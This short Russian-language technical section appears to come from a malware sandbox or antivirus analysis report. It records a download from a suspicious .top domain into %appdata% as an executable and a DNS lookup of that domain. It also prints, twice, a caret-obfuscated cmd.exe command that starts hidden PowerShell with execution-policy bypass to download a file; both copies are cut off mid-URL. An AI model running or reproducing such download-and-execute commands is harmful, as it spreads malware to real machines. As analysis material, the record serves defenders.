Техническая информация
- http://fooperight.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^wE^rSHel^L.EXE -e^X^ec^Ut^I^OnPOlIcy bypa^s^S -nO^pRo^F^ILe^ ^-W^InDO^wStY^l^E hi^dD^e^n^ (n^EW^-O^B^J^ecT^ ^SYSte^m.NeT^.w^e^BclIE^n^t^)^.DoW^NL^OA^d^FIl^e('http:/...
- DNS ASK fo###right.top
- '<SYSTEM32>\cmd.exe' /c "p^o^wE^rSHel^L.EXE -e^X^ec^Ut^I^OnPOlIcy bypa^s^S -nO^pRo^F^ILe^ ^-W^InDO^wStY^l^E hi^dD^e^n^ (n^EW^-O^B^J^ecT^ ^SYSte^m.NeT^.w^e^BclIE^n^t^)^.DoW^NL^OA^d^FIl^e('http:/...' (со скрытым окном)